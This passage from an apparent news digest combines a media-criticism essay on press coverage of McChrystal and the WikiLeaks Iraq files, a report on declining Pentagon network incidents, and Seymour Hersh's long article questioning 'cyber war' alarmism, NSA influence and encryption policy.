It seems Burns wrote that while standing and saluting in front of a large wall photograph of the General, or perhaps kneeling in front of it. The only hint of a criticism was quite backhanded: that McChrystal "blundered catastrophically" by failing to exercise sufficient caution when speaking to an Unestablished, Unaccepted, reckless, low-level loser like Michael Hastings, who simply did not know -- or refused to abide by -- the General-protecting rules that Real Reporters use when venerating covering for covering top military officials. And despite writing 2,700 praise-filled words about McChrystal, Burns never once mentioned little things like his central involvement in the Pat Tillman fraud or the widespread detainee abuse in Iraq under his command, until a reader asked about it, and only then, he mentioned it in passing to dismiss it. Burns' view of McChrystal is the very definition of journalistic hagiography.

Or consider this NYT profile of Gen. McChrystal by Elisabeth Bumiller and Mark Mazzetti, after he was named to run the war in Afghanistan, that was more creepily worshipful than any Us Weekly profile of a movie star whose baby pictures they are desperate to publish. It goes on and on with drooling praise, but this is how it begins:

Lt. Gen. Stanley A. McChrystal, the ascetic who is set to become the new top American commander in Afghanistan, usually eats just one meal a day, in the evening, to avoid sluggishness.

He is known for operating on a few hours’ sleep and for running to and from work while listening to audio books on an iPod. In Iraq, where he oversaw secret commando operations for five years, former intelligence officials say that he had an encyclopedic, even obsessive, knowledge about the lives of terrorists, and that he pushed his ranks aggressively to kill as many of them as possible.

But General McChrystal has also moved easily from the dark world to the light. Fellow officers on the Joint Chiefs of Staff, where he is director, and former colleagues at the Council on Foreign Relations describe him as a warrior-scholar, comfortable with diplomats, politicians and the military man who would help promote him to his new job.

"He's lanky, smart, tough, a sneaky stealth soldier," said Maj. Gen. William Nash, a retired officer. "He’s got all the Special Ops attributes, plus an intellect."
That article also never mentioned the issue of detainee abuse -- no need to bother NYT readers with such unpleasantries about the Lanky Smart Tough Warrior who will win Afghanistan -- while the Tillman incident was buried in a paragraph near the end and dismissed as the "one blot on his otherwise impressive military record." Remember, though: "the Times is 'not in the business of hagiography'." Upon McChrystal's firing, the Hillman Foundation's Charles Kaiser wrote a comprehensive piece documenting how the "unspoken rules" cited by Burns to attack Hastings were what led to widespread media protection and veneration of McChrystal, as embodied by the highly revealing though pernicious comments from CBS News' Lara Logan ("Michael Hastings has never served his country the way McChrystal has").

"Hagiography" is exactly what the American establishment media does, when it comes to powerful American political and military leaders. Slimy, personality-based hit pieces are reserved for those who are scorned by the powerful in Washington -- such as Julian Assange. So subservient to the Pentagon's agenda was the media coverage of the WikiLeaked documents that even former high-level journalists are emphatically objecting, and naming names. John Parker, former military reporter and fellow of the University of Maryland Knight Center for Specialized Journalism-Military Reporting, wrote an extraordinarily good letter yesterday:

The sad lack of coverage ("Sunday talk shows largely ignore WikiLeaks' Iraq files") of the leak of unfiltered, publicly owned information from the latest WikiLeak is disturbing, but not historically out of the ordinary for major American media.

The career trend of too many Pentagon journalists typically arrives at the same vanishing point: Over time they are co-opted by a combination of awe -- interacting so closely with the most powerfully romanticized force of violence in the history of humanity -- and the admirable and seductive allure of the sharp, amazingly focused demeanor of highly trained military minds. Top military officers have their s*** together and it's personally humbling for reporters who've never served to witness that kind of impeccable competence. These unspoken factors, not to mention the inner pull of reporters' innate patriotism, have lured otherwise smart journalists to abandon – justifiably in their minds – their professional obligation to treat all sources equally and skeptically.

Too many military reporters in the online/broadcast field have simply given up their watchdog role for the illusion of being a part of power. Example No. 1 of late is Tom Gjelten of NPR. . . Interviewed by his colleague on Oct. 22 about the latest WikiLeaks documents, this exchange happened:


Robert Siegel: And reaction to the release today?

Gjelten: Well, the Pentagon is, understandably, very angry, as they were when the documents from Afghanistan were released. They said this decision to release them was made cavalierly. They do point out - and I can't say I disagree (emphasis Parker's) - that the period in Iraq that these documents covered was already very well chronicled. They say it does not bring new understanding to those events.


There it is in black and white. Gjelten is lending his credibility to the Pentagon as "neutral" national journalist. . . . Gjelten, other Pentagon journalists and informed members of the public would benefit from watching "The Selling of the Pentagon," a 1971 documentary. It details how, in the height of the Vietnam War, the Pentagon sophisticatedly used taxpayer money against taxpayers in an effort to sway their opinions toward the Pentagon’s desires for unlimited war. Forty years later, the techniques of shaping public opinion via media has evolved exponentially. It has reached the point where flipping major journalists is a matter of painting in their personal numbers.
Precisely. The Pentagon has long been devoted to destroying the credibility and reputation of WikiLeaks, and the military-revering John Burns and his war-enabling newspaper, as usual, lent its helping hand to the Government's agenda. This is what NPR's Gjelten routinely does as well. The Pulitzer-Prize-winning David Cay Johnston, formerly of the NYT, wrote his own letter yesterday supporting Parker, citing the media's Pentagon-parroting line (from Gjelten and others) that there is nothing new in the WikiLeaks documents, and wrote: "If you want to ignore the facts or tell only the official version of events get a job as a flack." That is the job they have, only they're employed by our major media outlets. That's the principal problem. They receive most of their benefits -- their access, their scoops, their sense of belonging, their money, their esteem -- from dutifully serving that role.

Of course, another major reason why these media figures are so eager to parrot the Government line -- to try to destroy Assange and insist that there's "nothing new" in these horrifying documents -- is because they cheered for these wars in the first place. The Washington Post's Editorial Page Editor, Fred Hiatt, was one of the most vocal cheerleaders for the attack on Iraq, and so predictably, the Post (like NPR's Gjelten) ran an Editorial yesterday echoing the Pentagon and belittling the WikiLeaks documents as Nothing New Here. If that's true, perhaps Hiatt can point to the article where the Post previously reported on the existence of Frago 242, the secret order which instructed American troops not to investigate Iraqi abuse, or perhaps he can explain why the Post's own Baghdad Bureau Chief for much of the war, Ellen Knickmeyer, finds plenty new in the WikiLeaks documents: "Thanks to WikiLeaks, though, I now know the extent to which top American leaders lied, knowingly, to the American public, to American troops, and to the world, as the Iraq mission exploded."

Media figures like Burns, Gjelten, Hiatt and the NYT want you to think there's nothing new in these documents, and to focus instead on Julian Assange's alleged personality flaws (or the prospects that he -- rather than the criminals he exposed -- should be prosecuted), because that way they hope you won't notice all the blood on their hands. That's one major benefit. The other is that they discharge their prime function of currying favor with and serving the interests of the powerful Washington figures whom they "cover."

* * * * *

There's one specific inaccuracy in Burns' response to me which I want to highlight. The Yahoo! article states: "Burns took issue with Greenwald's suggestion that he's 'a borderline-sociopath' who's now coping with the guilt of having 'enabled and cheered' on the Iraq war." I didn't actually call Burns that. What I wrote was that, in light of what these documents reveal, "even" a borderline-sociopath would be awash with guilt over having supported this war and would be eager to distract attention away from that -- by belittling the importance of the documents and focusing instead on the messenger: Julian Assange. In other words, there's only one category of people who would not feel such guilt -- an absolute sociopath -- and I was generously assuming that Burns was not in that category, which is why I would expect (and hope) that he is driven by guilt over the war he supported. That's the most generous explanation I can think of for why -- in the face of these startling, historic revelations -- his journalistic choice was to pass on personality chatter about Assange.

UPDATE: The New York Times offered a feature today -- "Ask The New York Times" -- where readers can ask questions of the various reporters who worked on the WikiLeaks story. The first two questions were about the criticisms I've voiced about that coverage over the last few days (or at least the first question was: about my critique of the substance of the NYT's coverage); the second question was merely a general one about the reasons why the NYT published the "hit piece" on Julian Assange, and Burns answered and took that opportunity to "address" my criticisms specifically.

I don't have much to add to what either reporter said there, as I think my critiques stand on their own, and I've already addressed most of the excuses offered. I will, however, note two points: (1) one of the cheapest, most slothful and most intellectually dishonest methods for refuting an argument is to mockingly slap the label of "conspiracy theory" on it, as though the argument then becomes self-refuting; that's virtually always a non-responsive strawman, and that's exactly what Burns does in purporting to address my criticisms even though, manifestly, nothing I said qualifies as such; and (2) it's a very significant -- and positive -- change even from a couple of years ago that these reporters are not only loudly exposed to criticisms of their work, but feel compelled to expend substantial efforts engaging them and responding.

As for John Burns' overarching mentality, consider what he said on PBS' News Hour in July, after Gen. McChrystal had been fired, about the lesson that should be learned from that episode: "I think we in the press have to really look at cases like this and say, to what extent can we change the way we behave in such a way that this sort of thing doesn't happen again?" If an Important and Great Man like Gen. McChrystal ends up negatively affected as a result of truths uncovered by a real journalist (Michael Hastings), then -- sayeth John Burns -- the media must change its behavior, for that is the opposite of what it ought to be doing.

Despite Scare Talk, Attacks on Pentagon Networks Drop
Noah Shachtman

Listen to the generals speak, and you’d think the Pentagon’s networks were about to be overrun with worms and Trojans. But a draft federal report indicates that the number of “incidents of malicious cyber activity” in the Defense Department has actually decreased in 2010. It’s the first such decline since the turn of the millennium.

In the first six months of 2010, there were about 30,000 such incidents, according to statistics compiled by the U.S.-China Economic and Security Review Commission. Last year, there were more than 71,000. “If the rate of malicious activity from the first half of this year continues through the end of the year,” the commission notes in a draft report on China and the internet, “2010 could be the first year in a decade in which the quantity of logged events declines.”

The figures are in stark contrast to the sky-is-falling talk coming out of the Beltway.

“Over the past ten years, the frequency and sophistication of intrusions into U.S. military networks have increased exponentially,” Deputy Defense Secretary William Lynn wrote in a recent issue of Foreign Affairs.

In his April Senate Armed Services Committee confirmation hearing, U.S. Cyber Command and National Security Agency chief Lt. Gen. Keith Alexander said he was “alarmed by the increase, especially this year” in the number of attempts to scan military networks for potential vulnerabilities. His NSA predecessor, retired Adm. Mike McConnell, took things three steps further, writing: “the United States is fighting a cyber-war today, and we are losing.”

The report cautioned that the drop in “malicious activity … may or may not represent a decrease in the volume of attempts to penetrate defense and military networks.” Instead, the Pentagon seems to be doing a little better job in securing its networks, ever since a relatively-unsophisticated worm made its way onto hundreds of thousands of military computers in late 2008.

During “Operation Buckshot Yankee,” the subsequent clean-up effort, military leaders found that they were unable to gather even the most basic information about how their computers were configured — and what programs might be living in their networks.

In response, implementation of a new, Host-Based Security System was accelerated, for better threat detection. Information security training and patch updates are mandatory. And there’s now a Cyber Command responsible for coordinating threat monitoring, network defense and information attack. Leaders now have “greater visibility of threat activity, vulnerability, and ultimately risk” into network threats, the report says. “Greater resources, enhanced perimeter defenses, and the establishment of U.S. Cyber Command” have all helped, as well.

Does that mean the Pentagon is suddenly safe from hack attacks? Of course not. Could some adversaries be in the process of trading malware quantity for malware quality? Of course they could. But, at least in this most basic of measures, there are indications that the threat to Defense Department networks may not be quite as overwhelming and unstoppable as some in the military brass have led us to believe.

Should We be Worried About a Cyber War?
Seymour M. Hersh

On April 1, 2001, an American EP-3E Aries II reconnaissance plane on an eavesdropping mission collided with a Chinese interceptor jet over the South China Sea, triggering the first international crisis of George W. Bush’s Administration. The Chinese jet crashed, and its pilot was killed, but the pilot of the American aircraft, Navy Lieutenant Shane Osborn, managed to make an emergency landing at a Chinese F-8 fighter base on Hainan Island, fifteen miles from the mainland. Osborn later published a memoir, in which he described the “incessant jackhammer vibration” as the plane fell eight thousand feet in thirty seconds, before he regained control.

The plane carried twenty-four officers and enlisted men and women attached to the Naval Security Group Command, a field component of the National Security Agency. They were repatriated after eleven days; the plane stayed behind. The Pentagon told the press that the crew had followed its protocol, which called for the use of a fire axe, and even hot coffee, to disable the plane’s equipment and software. These included an operating system created and controlled by the N.S.A., and the drivers needed to monitor encrypted Chinese radar, voice, and electronic communications. It was more than two years before the Navy acknowledged that things had not gone so well. “Compromise by the People’s Republic of China of undestroyed classified material . . . is highly probable and cannot be ruled out,” a Navy report issued in September, 2003, said.

The loss was even more devastating than the 2003 report suggested, and its dimensions have still not been fully revealed. Retired Rear Admiral Eric McVadon, who flew patrols off the coast of Russia and served as a defense attaché in Beijing, told me that the radio reports from the aircraft indicated that essential electronic gear had been dealt with. He said that the crew of the EP-3E managed to erase the hard drive—“zeroed it out”—but did not destroy the hardware, which left data retrievable: “No one took a hammer.” Worse, the electronics had recently been upgraded. “Some might think it would not turn out as badly as it did, but I sat in some meetings about the intelligence cost,” McVadon said. “It was grim.”

The Navy’s experts didn’t believe that China was capable of reverse-engineering the plane’s N.S.A.-supplied operating system, estimated at between thirty and fifty million lines of computer code, according to a former senior intelligence official. Mastering it would give China a road map for decrypting the Navy’s classified intelligence and operational data. “If the operating system was controlling what you’d expect on an intelligence aircraft, it would have a bunch of drivers to capture radar and telemetry,” Whitfield Diffie, a pioneer in the field of encryption, said. “The plane was configured for what it wants to snoop, and the Chinese would want to know what we wanted to know about them—what we could intercept and they could not.” And over the next few years the U.S. intelligence community began to “read the tells” that China had access to sensitive traffic.

The U.S. realized the extent of its exposure only in late 2008. A few weeks after Barack Obama’s election, the Chinese began flooding a group of communications links known to be monitored by the N.S.A. with a barrage of intercepts, two Bush Administration national-security officials and the former senior intelligence official told me. The intercepts included details of planned American naval movements. The Chinese were apparently showing the U.S. their hand. (“The N.S.A. would ask, ‘Can the Chinese be that good?’ ” the former official told me. “My response was that they only invented gunpowder in the tenth century and built the bomb in 1965. I’d say, ‘Can you read Chinese?’ We don’t even know the Chinese pictograph for ‘Happy hour.’ ”)

Why would the Chinese reveal that they had access to American communications? One of the Bush national-security officials told me that some of the aides then working for Vice-President Dick Cheney believed—or wanted to believe—that the barrage was meant as a welcome to President Obama. It is also possible that the Chinese simply made a mistake, given the difficulty of operating surgically in the cyber world.

Admiral Timothy J. Keating, who was then the head of the Pacific Command, convened a series of frantic meetings in Hawaii, according to a former C.I.A. official. In early 2009, Keating brought the issue to the new Obama Administration. If China had reverse-engineered the EP-3E’s operating system, all such systems in the Navy would have to be replaced, at a cost of hundreds of millions of dollars. After much discussion, several current and former officials said, this was done. (The Navy did not respond to a request for comment on the incident.)

Admiral McVadon said that the loss prompted some black humor, with one Navy program officer quoted as saying, “This is one hell of a way to go about getting a new operating system.”

The EP-3E debacle fuelled a longstanding debate within the military and in the Obama Administration. Many military leaders view the Chinese penetration as a warning about present and future vulnerabilities—about the possibility that China, or some other nation, could use its expanding cyber skills to attack America’s civilian infrastructure and military complex. On the other side are those who argue for a civilian response to the threat, focussed on a wider use of encryption. They fear that an overreliance on the military will have adverse consequences for privacy and civil liberties.

In May, after years of planning, the U.S. Cyber Command was officially activated, and took operational control of disparate cyber-security and attack units that had been scattered among the four military services. Its commander, Army General Keith Alexander, a career intelligence officer, has made it clear that he wants more access to e-mail, social networks, and the Internet to protect America and fight in what he sees as a new warfare domain—cyberspace. In the next few months, President Obama, who has publicly pledged that his Administration will protect openness and privacy on the Internet, will have to make choices that will have enormous consequences for the future of an ever-growing maze of new communication techniques: Will America’s networks be entrusted to civilians or to the military? Will cyber security be treated as a kind of war?

Even as the full story of China’s EP-3E coup remained hidden, “cyber war” was emerging as one of the nation’s most widely publicized national-security concerns. Early this year, Richard Clarke, a former White House national-security aide who warned about the threat from Al Qaeda before the September 11th attacks, published “Cyber War,” an edgy account of America’s vulnerability to hackers, both state-sponsored and individual, especially from China. “Since the late 1990s, China has systematically done all the things a nation would do if it contemplated having an offensive cyber war capability,” Clarke wrote. He forecast a world in which China might unleash havoc:

Within a quarter of an hour, 157 major metropolitan areas have been thrown into knots by a nationwide power blackout hitting during rush hour. Poison gas clouds are wafting toward Wilmington and Houston. Refineries are burning up oil supplies in several cities. Subways have crashed in New York, Oakland, Washington, and Los Angeles. . . . Aircraft are literally falling out of the sky as a result of midair collisions across the country. . . . Several thousand Americans have already died.

Retired Vice-Admiral J. Michael McConnell, Bush’s second director of National Intelligence, has issued similar warnings. “The United States is fighting a cyber war today, and we are losing,” McConnell wrote earlier this year in the Washington Post. “Our cyber-defenses are woefully lacking.” In February, in testimony before the Senate Commerce, Science, and Transportation Committee, he said, “As a consequence of not mitigating the risk, we’re going to have a catastrophic event.”

A great deal of money is at stake. Cyber security is a major growth industry, and warnings from Clarke, McConnell, and others have helped to create what has become a military-cyber complex. The federal government currently spends between six and seven billion dollars annually for unclassified cyber-security work, and, it is estimated, an equal amount on the classified portion. In July, the Washington Post published a critical assessment of the unchecked growth of government intelligence agencies and private contractors. Benjamin Powell, who served as general counsel for three directors of the Office of National Intelligence, was quoted as saying of the cyber-security sector, “Sometimes there was an unfortunate attitude of bring your knives, your guns, your fists, and be fully prepared to defend your turf. . . . Because it’s funded, it’s hot and it’s sexy.”

Clarke is the chairman of Good Harbor Consulting, a strategic-planning firm that advises governments and companies on cyber security and other issues. (He says that more than ninety per cent of his company’s revenue comes from non-cyber-related work.) McConnell is now an executive vice-president of Booz Allen Hamilton, a major defense contractor. Two months after McConnell testified before the Senate, Booz Allen Hamilton landed a thirty-four-million-dollar cyber contract. It included fourteen million dollars to build a bunker for the Pentagon’s new Cyber Command.

American intelligence and security officials for the most part agree that the Chinese military, or, for that matter, an independent hacker, is theoretically capable of creating a degree of chaos inside America. But I was told by military, technical, and intelligence experts that these fears have been exaggerated, and are based on a fundamental confusion between cyber espionage and cyber war. Cyber espionage is the science of covertly capturing e-mail traffic, text messages, other electronic communications, and corporate data for the purpose of gathering national-security or commercial intelligence. Cyber war involves the penetration of foreign networks for the purpose of disrupting or dismantling those networks, and making them inoperable. (Some of those I spoke to made the point that China had demonstrated its mastery of cyber espionage in the EP-3E incident, but it did not make overt use of it to wage cyber war.) Blurring the distinction between cyber war and cyber espionage has been profitable for defense contractors—and dispiriting for privacy advocates.

Clarke’s book, with its alarming vignettes, was praised by many reviewers. But it received much harsher treatment from writers in the technical press, who pointed out factual errors and faulty assumptions. For example, Clarke attributed a severe power outage in Brazil to a hacker; the evidence pointed to sooty insulators.

The most common cyber-war scare scenarios involve America’s electrical grid. Even the most vigorous privacy advocate would not dispute the need to improve the safety of the power infrastructure, but there is no documented case of an electrical shutdown forced by a cyber attack. And the cartoonish view that a hacker pressing a button could cause the lights to go out across the country is simply wrong. There is no national power grid in the United States. There are more than a hundred publicly and privately owned power companies that operate their own lines, with separate computer systems and separate security arrangements. The companies have formed many regional grids, which means that an electrical supplier that found itself under cyber attack would be able to avail itself of power from nearby systems. Decentralization, which alarms security experts like Clarke and many in the military, can also protect networks.

In July, there were reports that a computer worm, known as Stuxnet, had infected thousands of computers worldwide. Victims, most of whom were unharmed, were able to overcome the attacks, although it sometimes took hours or days to even notice them. Some of the computers were inside the Bushehr nuclear-energy plant, in Iran, and this led to speculation that Israel or the United States might have developed the virus. A Pentagon adviser on information warfare told me that it could have been an attempted “semantic attack,” in which the virus or worm is designed to fool its victim into thinking that its computer systems are functioning properly, when in fact they are not, and may not have been for some time. (This month, Microsoft, whose Windows operating systems were the main target of Stuxnet, completed a lengthy security fix, or patch.)

If Stuxnet was aimed specifically at Bushehr, it exhibited one of the weaknesses of cyber attacks: they are difficult to target and also to contain. India and China were both hit harder than Iran, and the virus could easily have spread in a different direction, and hit Israel itself. Again, the very openness of the Internet serves as a deterrent against the use of cyber weapons.

Bruce Schneier, a computer scientist who publishes a widely read blog on cyber security, told me that he didn’t know whether Stuxnet posed a new threat. “There’s certainly no actual evidence that the worm is targeted against Iran or anybody,” he said in an e-mail. “On the other hand, it’s very well designed and well written.” The real hazard of Stuxnet, he added, might be that it was “great for those who want to believe cyber war is here. It is going to be harder than ever to hold off the military.”

A defense contractor who is regarded as one of America’s most knowledgeable experts on Chinese military and cyber capabilities took exception to the phrase “cyber war.” “Yes, the Chinese would love to stick it to us,” the contractor told me. “They would love to transfer economic and business innovation from West to East. But cyber espionage is not cyber war.” He added, “People have been sloppy in their language. McConnell and Clarke have been pushing cyber war, but their evidentiary basis is weak.”

James Lewis, a senior fellow at the Center for Strategic and International Studies, who worked for the Departments of State and Commerce in the Clinton Administration, has written extensively on the huge economic costs due to cyber espionage from China and other countries, like Russia, whose hackers are closely linked to organized crime. Lewis, too, made a distinction between this and cyber war: “Current Chinese officials have told me that we’re not going to attack Wall Street, because we basically own it”—a reference to China’s holdings of nearly a trillion dollars in American securities—“and a cyber-war attack would do as much economic harm to us as to you.”

Nonetheless, China “is in full economic attack” inside the United States, Lewis says. “Some of it is economic espionage that we know and understand. Some of it is like the Wild West. Everybody is pirating from everybody else. The U.S.’s problem is what to do about it. I believe we have to begin by thinking about it”—the Chinese cyber threat—“as a trade issue that we have not dealt with.”

The bureaucratic battle between the military and civilian agencies over cyber security—and the budget that comes with it—has made threat assessments more problematic. General Alexander, the head of Cyber Command, is also the director of the N.S.A., a double role that has caused some apprehension, particularly on the part of privacy advocates and civil libertarians. (The N.S.A. is formally part of the Department of Defense.) One of Alexander’s first goals was to make sure that the military would take the lead role in cyber security and in determining the future shape of computer networks. (A Department of Defense spokesman, in response to a request to comment on this story, said that the department “continues to adhere to all laws, policies, directives, or regulations regarding cyberspace. The Department of Defense maintains strong commitments to protecting civil liberties and privacy.”)

The Department of Homeland Security has nominal responsibility for the safety of America’s civilian and private infrastructure, but the military leadership believes that the D.H.S. does not have the resources to protect the electrical grids and other networks. (The department intends to hire a thousand more cyber-security staff members over the next three years.) This dispute became public when, in March, 2009, Rodney Beckstrom, the director of the D.H.S.’s National Cybersecurity Center, abruptly resigned. In a letter to Secretary Janet Napolitano, Beckstrom warned that the N.S.A. was effectively controlling her department’s cyber operations: “While acknowledging the critical importance of N.S.A. to our intelligence efforts . . . the threats to our democratic processes are significant if all top level government network security and monitoring are handled by any one organization.” Beckstrom added that he had argued for civilian control of cyber security, “which interfaces with, but is not controlled by, the N.S.A.”

General Alexander has done little to reassure critics about the N.S.A.’s growing role. In the public portion of his confirmation hearing, in April, before the Senate Armed Services Committee, he complained of a “mismatch between our technical capabilities to conduct operations and the governing laws and policies.”

Alexander later addressed a controversial area: when to use conventional armed forces to respond to, or even preëmpt, a network attack. He told the senators that one problem for Cyber Command would be to formulate a response based on nothing more than a rough judgment about a hacker’s intent. “What’s his game plan? Does he have one?” he said. “These are tough issues, especially when attribution and neutrality are brought in, and when trying to figure out what’s come in.” At this point, he said, he did not have “the authority . . . to reach out into a neutral country and do an attack. And therein lies the complication. . . . What do you do to take that second step?”

Making the same argument, William J. Lynn III, the Deputy Secretary of Defense, published an essay this fall in Foreign Affairs in which he wrote of applying the N.S.A.’s “defense capabilities beyond the ‘.gov’ domain,” and asserted, “As a doctrinal matter, the Pentagon has formally recognized cyberspace as a new domain of warfare.” This definition raises questions about where the battlefield begins and where it ends. If the military is operating in “cyberspace,” does that include civilian computers in American homes?

Lynn also alluded to a previously classified incident, in 2008, in which some N.S.A. unit commanders, facing penetration of their bases’ secure networks, concluded that the break-in was caused by a disabling thumb drive; Lynn said that it had been corrupted by “a foreign intelligence agency.” (According to press reports, the program was just as likely to be the product of hackers as that of a government.) Lynn termed it a “wakeup call” and a “turning point in U.S. cyber defense strategy.” He compared the present moment to the day in 1939 when President Franklin D. Roosevelt got a letter from Albert Einstein about the possibility of atomic warfare.

But Lynn didn’t mention one key element in the commanders’ response: they ordered all ports on the computers on their bases to be sealed with liquid cement. Such a demand would be a tough sell in the civilian realm. (And a Pentagon adviser suggested that many military computer operators had simply ignored the order.)

A senior official in the Department of Homeland Security told me, “Every time the N.S.A. gets involved in domestic security, there’s a hue and cry from people in the privacy world.” He said, though, that coöperation between the military and civilians had increased. (The Department of Homeland Security recently signed a memorandum with the Pentagon that gives the military authority to operate inside the United States in case of cyber attack.) “We need the N.S.A., but the question we have is how to work with them and still say and demonstrate that we are in charge in the areas for which we are responsible.”

This official, like many I spoke to, portrayed the talk about cyber war as a bureaucratic effort “to raise the alarm” and garner support for an increased Defense Department role in the protection of private infrastructure. He said, “You hear about cyber war all over town. This”—he mentioned statements by Clarke and others—“is being done to mobilize a political effort. We always turn to war analogies to mobilize the people.”

In theory, the fight over whether the Pentagon or civilian agencies should be in charge of cyber security should be mediated by President Obama’s coördinator for cyber security, Howard Schmidt—the cyber czar. But Schmidt has done little to assert his authority. He has no independent budget control and in a crisis would be at the mercy of those with more assets, such as General Alexander. He was not the Administration’s first choice for the cyber-czar job—reportedly, several people turned it down. The Pentagon adviser on information warfare, in an e-mail that described the lack of an over-all policy and the “cyber-pillage” of intellectual property, added the sort of dismissive comment that I heard from others: “It’s ironic that all this goes on under the nose of our first cyber President. . . . Maybe he should have picked a cyber czar with more than a mail-order degree.” (Schmidt’s bachelor’s and master’s degrees are from the University of Phoenix.)

Howard Schmidt doesn’t like the term “cyber war.” “The key point is that cyber war benefits no one,” Schmidt told me in an interview at the Old Executive Office Building. “We need to focus on that fact. When people tell me that these guys or this government is going to take down the U.S. military with information warfare I say that, if you look at the history of conflicts, there’s always been the goal of intercepting the communications of combatants—whether it’s cutting down telephone poles or intercepting Morse-code signalling. We have people now who have found that warning about ‘cyber war’ has become an unlikely career path”—an obvious reference to McConnell and Clarke. “All of a sudden, they have become experts, and they get a lot of attention. ‘War’ is a big word, and the media is responsible for pushing this, too. Economic espionage on the Internet has been mischaracterized by people as cyber war.”

Schmidt served in Vietnam, worked as a police officer for several years on a SWAT team in Arizona, and then specialized in computer-related crimes at the F.B.I. and in the Air Force’s investigative division. In 1997, he joined Microsoft, where he became chief of security, leaving after the 9/11 attacks to serve in the Bush Administration as a special adviser for cyber security. When Obama hired him, he was working as the head of security for eBay. When I asked him about the ongoing military-civilian dispute, Schmidt said, “The middle way is not to give too much authority to one group or another and to make sure that we share information with each other.”

Schmidt continued, “We have to protect our infrastructure and our way of life, for sure. We do have vulnerabilities, and we do talk about worst-case scenarios” with the Pentagon and the Department of Homeland Security. “You don’t see a looming war and just wait for it to come.” But, at the same time, “we have to keep our shipping lanes open, to continue to do commerce, and to freely use the Internet.”

How should the power grid be protected? It does remain far too easy for a sophisticated hacker to break into American networks. In 2008, the computers of both the Obama and the McCain campaigns were hacked. Suspicion fell on Chinese hackers. People routinely open e-mails with infected attachments, allowing hackers to “enslave” their computers. Such machines, known as zombies, can be linked to create a “botnet,” which can flood and effectively shut down a major system. Hackers are also capable of penetrating a major server, like Gmail. Guesses about the cost of cyber crime vary widely, but one survey, cited by President Obama in a speech in May, 2009, put the price at more than eight billion dollars in 2007 and 2008 combined. Obama added, referring to corporate cyber espionage, “It’s been estimated that last year alone cyber criminals stole intellectual property from businesses worldwide worth up to one trillion dollars.”

One solution is mandated encryption: the government would compel both corporations and individuals to install the most up-to-date protection tools. This option, in some form, has broad support in the technology community and among privacy advocates. In contrast, military and intelligence eavesdroppers have resisted nationwide encryption since 1976, when the Diffie-Hellman key exchange (an encryption tool co-developed by Whitfield Diffie) was invented, for the most obvious of reasons: it would hinder their ability to intercept signals. In this sense, the N.S.A.’s interests align with those of the hackers.

John Arquilla, who has taught since 1993 at the U.S. Naval Postgraduate School in Monterey, California, writes in his book “Worst Enemies,” “We would all be far better off if virtually all civil, commercial, governmental, and military internet and web traffic were strongly encrypted.” Instead, many of those charged with security have adopted the view that “cyberspace can be defended with virtual fortifications—basically the ‘firewalls’ that everyone knows about. . . . A kind of Maginot Line mentality prevails.”

Arquilla added that America’s intelligence agencies and law-enforcement officials have consistently resisted encryption because of fears that a serious, widespread effort to secure data would interfere with their ability to electronically monitor and track would-be criminals or international terrorists. This hasn’t stopped sophisticated wrongdoers from, say, hiring hackers or encrypting files; it just leaves the public exposed, Arquilla writes. “Today drug lords still enjoy secure internet and web communications, as do many in terror networks, while most Americans don’t.”

Schmidt told me that he supports mandated encryption for the nation’s power and electrical infrastructure, though not beyond that. But, early last year, President Obama declined to support such a mandate, in part, Schmidt said, because of the costs it would entail for corporations. In addition to the setup expenses, sophisticated encryption systems involve a reliance on security cards and on constantly changing passwords, along with increased demands on employees and a ceding of control by executives to their security teams.

General Alexander, meanwhile, has continued to press for more authority, and even for a separate Internet domain—another Maginot Line, perhaps. One morning in September, he told a group of journalists that the Cyber Command needed what he called “a secure zone,” a separate space within the Internet to shelter the military and essential industries from cyber attacks. The secure zone would be kept under tight government control. He also assured the journalists, according to the Times, that “we can protect civil liberties, privacy, and still do our mission.” The General was more skeptical about his ability to please privacy advocates when he testified, a few hours later, before the House Armed Services Committee: “A lot of people bring up privacy and civil liberties. And then you say, ‘Well, what specifically are you concerned about?’ And they say, ‘Well, privacy and civil liberties.’ . . . Are you concerned that the anti-virus program that McAfee runs invades your privacy or civil liberties?’ And the answer is ‘No, no, no—but I’m worried that you would.’ ”

The Week in Review is edited and published by Jack Spratts.

This summer, the Wall Street Journal reported that the N.S.A. had begun financing a secret surveillance program called Perfect Citizen to monitor attempted intrusions into the computer networks of private power companies. The program calls for the installation of government sensors in those networks to watch for unusual activity. The Journal noted that some companies expressed concerns about privacy, and said that what they needed instead was better guidance on what to do in case of a major cyber attack. The N.S.A. issued a rare public response, insisting that there was no “monitoring activity” involved: “We strictly adhere to both the spirit and the letter of U.S. laws and regulations.”

A former N.S.A. operative I spoke to said, of Perfect Citizen, “This would put the N.S.A. into the job of being able to watch over our national communications grid. If it was all dot-gov, I would have no problem with the sensors, but what if the private companies rely on Gmail or att.net to communicate? This could put the N.S.A. into every service provider in the country.”

The N.S.A. has its own hackers. Many of them are based at a secret annex near Thurgood Marshall International Airport, outside Baltimore. (The airport used to be called Friendship Airport, and the annex is known to insiders as the FANX, for “Friendship annex.”) There teams of attackers seek to penetrate the communications of both friendly and unfriendly governments, and teams of defenders monitor penetrations and attempted penetrations of U.S. systems. The former N.S.A. operative, who served as a senior watch officer at a major covert installation, told me that the N.S.A. obtained invaluable on-the-job training in cyber espionage during the attack on Iraq in 1991. Its techniques were perfected during the struggle in Kosovo in 1999 and, later, against Al Qaeda in Iraq. “Whatever the Chinese can do to us, we can do better,” the technician said. “Our offensive cyber capabilities are far more advanced.”

Nonetheless, Marc Rotenberg, the president of the Electronic Privacy Information Center and a leading privacy advocate, argues that the N.S.A. is simply not competent enough to take a leadership role in cyber security. “Let’s put the issue of privacy of communications aside,” Rotenberg, a former Senate aide who has testified often before Congress on encryption policy and consumer protection, said. “The question is: Do you want an agency that spies with mixed success to be responsible for securing the nation’s security? If you do, that’s crazy.”

Nearly two decades ago, the Clinton Administration, under pressure from the N.S.A., said that it would permit encryption-equipped computers to be exported only if their American manufacturers agreed to install a government-approved chip, known as the Clipper Chip, in each one. It was subsequently revealed that the Clipper Chip would enable law-enforcement officials to have access to data in the computers. The ensuing privacy row embarrassed Clinton, and the encryption-equipped computers were permitted to be exported without the chip, in what amounted to a rebuke to the N.S.A.

That history may be repeating itself. The Obama Administration is now planning to seek broad new legislation that would enable national-security and law-enforcement officials to police online communications. The legislation, similar to that sought two decades ago in the Clipper Chip debate, would require manufacturers of equipment such as the BlackBerry, and all domestic and foreign purveyors of communications, such as Skype, to develop technology that would allow the federal government to intercept and decode traffic.

